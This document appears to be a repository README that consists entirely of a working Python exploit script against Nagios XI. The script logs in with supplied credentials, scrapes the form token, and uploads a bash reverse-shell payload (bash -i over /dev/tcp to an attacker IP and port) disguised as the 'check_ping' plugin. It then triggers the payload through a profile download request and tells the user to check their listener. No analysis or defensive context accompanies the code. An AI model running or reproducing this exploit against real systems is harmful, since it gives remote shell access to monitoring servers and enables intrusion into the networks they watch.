README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(host, ssl, username, password, reverse_ip, reverse_port):
proto = "https" if ssl else "http"
base_url = f"{proto}://{host}"
session = requests.Session()
session.verify = False
# Get login page and extract NSP
login_url = f"{base_url}/nagiosxi/login.php"
resp = session.get(login_url)
soup = BeautifulSoup(resp.text, 'html.parser')
nsp = soup.find('input', {'name': 'nsp'})['value']
# Login
login_data = {
'username': username,
'password': password,
'pageopt': 'login',
'nsp': nsp
}
resp = session.post(login_url, data=login_data)
if resp.status_code != 200:
print("Login failed")
return
# Get plugin management page and extract NSP
plugin_url = f"{base_url}/nagiosxi/admin/monitoringplugins.php"
resp = session.get(plugin_url)
soup = BeautifulSoup(resp.text, 'html.parser')
nsp = soup.find('input', {'name': 'nsp'})['value']
# Upload payload
payload = f"bash -i >& /dev/tcp/{reverse_ip}/{reverse_port} 0>&1"
files = {
'uploadedfile': ('check_ping', payload, 'text/plain')
}
data = {
'upload': '1',
'nsp': nsp,
'MAX_FILE_SIZE': '20000000'
}
resp = session.post(plugin_url, files=files, data=data)
# Trigger the payload
profile_url = f"{base_url}/nagiosxi/includes/components/profile/profile.php?cmd=download"
session.get(profile_url)
print("Exploit completed. Check your listener.")
if __name__ == "__main__":
if len(sys.argv) != 7:
print("Usage: python3 exploit.py <host> <ssl> <user> <password> <reverse_ip> <reverse_port>")
print("Example: python3 exploit.py 192.168.175.136 false nagiosadmin admin 192.168.45.213 4444")
sys.exit(1)
host = sys.argv[1]
ssl = sys.argv[2].lower() == 'true'
username = sys.argv[3]
password = sys.argv[4]
reverse_ip = sys.argv[5]
reverse_port = sys.argv[6]
exploit(host, ssl, username, password, reverse_ip, reverse_port)